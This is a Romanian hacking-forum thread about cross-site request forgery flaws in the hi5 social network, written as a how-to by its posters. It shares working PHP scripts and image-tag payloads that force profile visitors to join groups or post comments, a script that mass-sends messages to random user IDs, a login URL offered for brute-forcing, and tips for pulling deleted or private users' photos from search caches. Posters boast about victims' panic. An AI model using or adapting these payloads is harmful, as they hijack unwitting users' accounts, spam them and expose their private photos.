[RST] HI5.com - Vulnerabilitati CSRF [de actualitate]

[paxnWo]

deci ca sa inteleaga tot prostu ... faci un .php cu primul cod postat de tine si dai refresh ? si daca ai noroc te inscrie in grupuri ? cam ceva de genul ? www.thefags.ro/views.php

[loki]

primul cod postat e prima incercare de a gasi grupuri. Odata ce intri si iesi dintr-un grup te viziteaza baietii.

Da nu stiu ce ai facut tu acolo ca in loc de iframe iti vad sursa php

[Tz4Bu]

super frate

[mb88]

buna! puteti sa imi explicati/aratati cum se poate scrie acel .php, deoarece sunt incepator

P.S:Nu uita ca ai fost incepator, si, si tu ai avut nevoie de ajutor!

[Guest Kenpachi]

da dar poate ca eu nu am rugat pe nimeni sa imi faca si apoi sa imi arate cum functioneaza un script ci m'am pus sa invat si sa imi fac eu singur ... ce zici ?

[mb88]

am incercat chestia asta cu php-ul dar nu stiu daca am facut bine;am deschis notepad-ul si am copiat codul dat de lokipaki dupa care am salvat documentul urmat de .php("titlu.php").am deschis o noua pagina de net iar la adresa am scris destinatia unde am salvat documentul respectiv("titlu.php").Nu stiu daca ceea ce am facut ii bine, dar totusi am incercat

[loki]

php-urile nu se deschid de pe compul personal cu file://. Cauta-ti un host si baga http://..../titlu.php

[IadSiRai]

am testat si eu chestia asta cu hi5...ii ok dar dupa cum am observat eu ti se activeaza automat si tie,dar merita sa-i vezi p toti panicati(cine mi-a schimbat parola...de unde sti parola etc.)

buna treaba

[loki]

doream sa adun mai multe intr-un thread dar fara succes momentan asa ca doar un micut update:

- pentru schimbarea statusului musafirului nu mai merge editScrapbookTopicAjax.do ci:

http://hi5.com/friend/profile/editScrapbookTopic.do?topic=[NEWTOPIC]&editorId=topic

- Pentru dracu stie un brute force ceva:

http://www.hi5.com/friend/login.do?email=&password=[password]

direct link.

In about me nu mai accepta nici un fel de img src din alte surse decat hi5.com. Mama lor ca adunam si eu IP-uri ca nu am incredere in lista lor de vizitatori!!! Pana si grupul imi confirma ca sunt mai multi (si cineva iar s-a bagat acolo )

Pentru a aduna poze din profile dezactivate (we love porn si intotdeauna pozele sterse raman pe hi5): google search. Exemplu:

site:monicagabor.hi5.com 109217713 70575166

unde numerele reprezinta albumele de poze si ownerul. Intrati in cache-ul google. Cautarea se poate dezvolta. M-a amuzat profilul de mai sus, cititi comentariile pozelor.

Daca aveti un thumbnail la o poza pe hi5 (un profil fara acces, etc), link-ul se termina cu .small pe care il stergeti sa vedeti poza mare, sau se termina cu 01.jpg si atunci 02.jpg e poza mare.

[ady12666]

Mda...ieri le-a fost stearsa o parte mare din baza de date ,dar in 2-3ore au bagat backup-ul din nou.

[Cril]

inca una...

intri aici:

[url]http://hi5.com/friend/profile/editBasic.do[/url]

adaugi la "About me" / "Despre mine" :

[img]http://hi5.com/friend/photos/addPhotoComment.do?photoId=numar.fotografie&ownerId=numarul.contului.tau&albumId=numarul.albumului&comment=comentariul pozei[/img]

exemplu:

[img]http://hi5.com/friend/photos/addPhotoComment.do?photoId=548945474&ownerId=65465465&albumId=23423578&comment=comentariul pozei[/img]

De unde luati aceste date ?

intri in albumul in care se afla poza, o selectezi iar apoi vei vedea in browser(sus) :
un link de genul :
[url]http://hi5.com/friend/photos/displayPhotoUser.do?photoId=548945474&ownerId=65465465&albumId=23423578[/url]
si luati datele de acolo.

Ce face ?

Adauga comentariul dorit la poza aleasa (poate fi din albumul tau, sau al altcuiva, al oricui).

Altfel spus cine viziteaza profilul in care este inserat codul, lasa un comentariu la poza dorita. [nici nu stiam ca imi pot comenta singur profilul ]

/testat/

[Caracal]

Loooalleeee!!!

Cum sa ai j-de mii de vizitatori (cu oleaca de rabdare): scrieti un .php si ii dati refresh cat vreti sau inlocuiti 20 cu ceva mai mare. Nu uitati sa fiti logati in Hi5.

<?

for($i=0;$i<20;$i++)

{ $group=rand(2000000, 3999999);

echo '<iframe src="http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId='.$group.'"></iframe>';

}

?>

si "inversul" care e? adica sa ma sterg din grupurile alea...fara sa le iau la rand

[Gentleman]

ok nu prea imi omor io timpul cu chesti dastea - adica reply pe subiect ca ajung sa pun intrebari sterile .. - daca un hi5 a fost sters de user .. exista un o posibiltate de recuperare a contului .. si daca mailul cu care a fost facut contul nu ma este recunoscut de baza de dete a hi5 .. mai exista aceasta posibilitate de recuperare ? ... presupun ca nu

[Caracal]

ok nu prea imi omor io timpul cu chesti dastea - adica reply pe subiect ca ajung sa pun intrebari sterile .. - daca un hi5 a fost sters de user .. exista un o posibiltate de recuperare a contului .. si daca mailul cu care a fost facut contul nu ma este recunoscut de baza de dete a hi5 .. mai exista aceasta posibilitate de recuperare ? ... presupun ca nu

delete`u de acu e vrajeala bifezi ca vrei sa stergi contu si la urmatoarea logare te intreaba daca vrei sa`l reactivezi

cand mi l`am sters eu...acu ceva timp, m`am gandit ca`l vreau inapoi. nu puteam sa ma intru pe cont ca si cum n`ar fi buna parola. daca incercam sa fac un cont pe acelasi mail, imi spunea ca trebuie altu (ala e deja inregistrat). le`am trimis mail, le`am zis ca m`am razgandit si`l vreau inapoi...si ei mi l`au reactivat

daca nu mai ai mail`u, nu vad cum il recuperezi

[Kristy4n]

@lokipaki

Asa zisul 'grabber' nu pare sa functioneze ... cel putin nu la mine . Am host pe 3x.ro . partea ciudata e ca de cate ori intru pe link IE7 zice 'cannot display this page' dar in adress bar imi apare favico de la hi5 .

Am incercat sa modific prin script dar nu am reusit , sunt cam n00b la asa ceva . Totusi am observat ca pana la $count (randurile de jos avand // in fata ) merge perfect si scrie cate grupuri a gasit , dar in rest nimic ...

O sa incerc in continuare sa rezolv , sa ma perfectionez

Oricum GoodJob !

/LE:

Dupa cateva tweakuri am reusit -- Poate functioneaza si al lui lokipaki dar nu stiu eu sa il folosesc --

-I'm not that n00b after all

<?php 
if(!$search) $search="abc"; 
$link="http://www.hi5.com/friend/processBrowseSearch.do?textSearchField=all&restype=groups&name=" .$search. "&page=next&offset="; 

$page=file_get_contents($link); 
$s=explode('rel="groupsres">Groups <span>(', $page); 
$s=explode(')</span></a>', $s[1]); 
$count=$s[0]; 

$grouplist=explode('<h2 class="resultname">[url="http://www.hi5.com/friend/group/' . $groupnumber[0] . '--BagPa--front-html"]' . $groupnumber[0] . '[/url]
'; 

		//cod de test 
	} 



?> 

*Am cenzurat

[Kristy4n]

Un mic update ca sa faceti lumea sa se simta mai bine

 
<?php 
if(!$search) $search="manele"; 
$link="http://www.hi5.com/friend/processBrowseSearch.do?textSearchField=all&restype=groups&name=" .$search. "&page=next&offset="; 

$page=file_get_contents($link); 
$s=explode('rel="groupsres">Groups <span>(', $page); 
$s=explode(')</span></a>', $s[1]); 
$count=$s[0]; 

$grouplist=explode('<h2 class="resultname"><a title="" href="/friend/group/',$page); 



	for($j=0; $j<30; $j++) 
	{   $groupnumber=explode('--', $grouplist[$j+1]); 

	echo ' <plaintext>  [img=http://www.hi5.com/friend/group/joinGroup.do?accessCode=&invitorId=&contactId=&friendId=&groupId='.$groupnumber[0].']  '; 

	} 



?>

Il salvati nume.php , uploadati pe un web server care sa aiba si PHP (eu folosesc 3x.ro ) si apoi accesati www.site.ro/nume.php?search=ceva , scriptul va genera o lista cu linkuri catre 30 de grupuri cu numele 'ceva' sau un nume asemanator .

Lista o copiati in notepad apoi apasati CTRL+H (replace) In FInd what : scrieti <plaintext> si in replace with apasati 1 space . Acest lucru va sterge <plaintext> din lista . Apoi lista o copiati in rubrica About me din hi5 , iar norocosul care va va vizualiza profilul va fi inscris automat in grupurile din lista .

Ca sa fie mai interesant scrieti la ?search 'manele' sau fiti originali

-O sa mai imbunatatesc scriptul sa ajut cat mai mult revin maine

[Hellbound]

asa am facut si eu ... dar presoanei care imi da comm sau care imi vizualizeaza nu este inregistrata in 30 grupuri cum ziceai u

[andy95]

yo dc nu pot sa vad niciunu din codurile lu nemessis ?

[black_death_c4t]

yo dc nu pot sa vad niciunu din codurile lu nemessis ?

Dai quote la msg lui vad ca vbulletin ia si in

[andy95]

ok ... ms k mi-ai spus dar le-am gasit pe alt site cu credite spre rst si sunt bune

[dorin12]

Multumim ca ne dai mura`n gura...dar am o intrebare.Folosesc Mozilla Firefox ultima versiune...si in "CODE" totul e gol, nimic de copiat...nu am ceva plugin sau o fi ceva bug ?

[black_death_c4t]

Multumim ca ne dai mura`n gura...dar am o intrebare.Folosesc Mozilla Firefox ultima versiune...si in "CODE" totul e gol, nimic de copiat...nu am ceva plugin sau o fi ceva bug ?

Stii sa citesti ? Holba ochii mai sus la postul meu

[rkn]

Sa vedem ce avem aici.

[icewizard333]

suna bine ce avem aici

[leximus2002]

am o problema legata de un script care ar trebui sa trimita mesaje la useri de pe hi5.

scriptul este acesta:

<?php
for($i=0;$i<150;$i++)
{ $k=rand(444444444, 555555555);
echo '<iframe src="http://hi5.com/friend/mail/sendMail.do?toIds=F:'.$k.'&subject=subiect&method=send&body=text&timestamp=-8142471507180713907&mailOp=&senderId=&msgId=&submitSend=Send+Message"></iframe>';
}
?>

l-am uploadat pe un site, dar nu merge. primesc o eroare: Sorry, an unexpected error was encountered validating your input. Please try again later.

daca incerc sa folosesc link-ul din codul de mai sus si sa trimit la un singur user, imi apare pagina de compus mesajul, cu subiectul si body-ul pus de mine, dar nu-l trimite.

ma poate ajuta careva?

Multumesc!